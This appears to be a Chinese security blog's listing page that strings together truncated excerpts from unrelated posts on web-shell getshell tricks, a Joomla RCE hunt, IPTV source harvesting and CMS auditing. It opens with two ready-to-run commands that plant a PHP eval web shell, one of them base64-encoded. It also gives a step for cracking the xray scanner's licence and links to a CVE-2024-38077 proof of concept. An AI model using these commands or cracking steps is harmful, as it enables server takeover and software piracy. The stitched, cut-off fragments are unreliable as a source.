php代码执行&命令执行 getshell echo PD9waHAgZXZhbCgkX1BPU1Rbd2hvYW1pXSk7Pz4=|base64 -d > /var/www/html/shell.php echo \<\?php eval\(\@\$_POST\[1\]\)\; \?\> >1.php bypass 绕过...

简单分析： ignore_user_abort()函数设置与客户机断开是否会终止脚本的执行。这里设置为true则忽略与用户的断开，即使与客户机断开脚本仍会执行。 set_time_limit()函数设置脚本最大执行时间。...

xray1.9.4 破解 jl 修改为 jnl，点击补丁保存

访问网站主页，是一个博客网站 常规的目录扫描 这里发现一个疑似后台地址，访问 http://192.168.2.252/administrator/ 为 joomla 站点，印象中记得有 rce 的漏洞，上网寻找相关脚本进行利...

一 WSDL 类 WSDL 描述 Web 服务的公共接口。这是一个基于 XML 的关于如何与 Web 服务通讯和使用的服务描述；也就是描述与目录中列出的 Web 服务进行交互时需要绑定的协议和信息格式。通常采用抽...

前面有用到fofa的空间测绘获取酒店源和组播源，今天试试钟馗之眼来获取酒店源： 利用工具网络测绘：钟馗之眼（https://www.zoomeye.org/） 一、酒店源获取 首先需要找到有效的酒店源IP，其次在...

最近发现很多用户反馈的一些问题与磁盘挂载有关，1、安装完面板后发现磁盘容量与实际购买容量不符2、重启服务器后面板无法访问，网站、数据库文件丢失 以上都是因为未挂载磁盘，或挂载操作不当...

一个简单的工具，可使用 AI 将屏幕截图、模型和 Figma 设计转换为干净、实用的代码。 支持的堆栈： HTML + 顺风 反应 + 顺风 Vue + 顺风 引导程序 离子 + 顺风 静止无功发生器 支持的AI模型： G...

0x00前言 好些天没写文章了，今天给大家分享一篇对于熊海cms的审计 本文所使用的环境为phpstudy的php5.2.17版本+apache 0x01正文 看过我之前文章的朋友知道：在审计之前，我们可以通过查询CNVD...

https://github.com/CloudCrowSec001/CVE-2024-38077-POC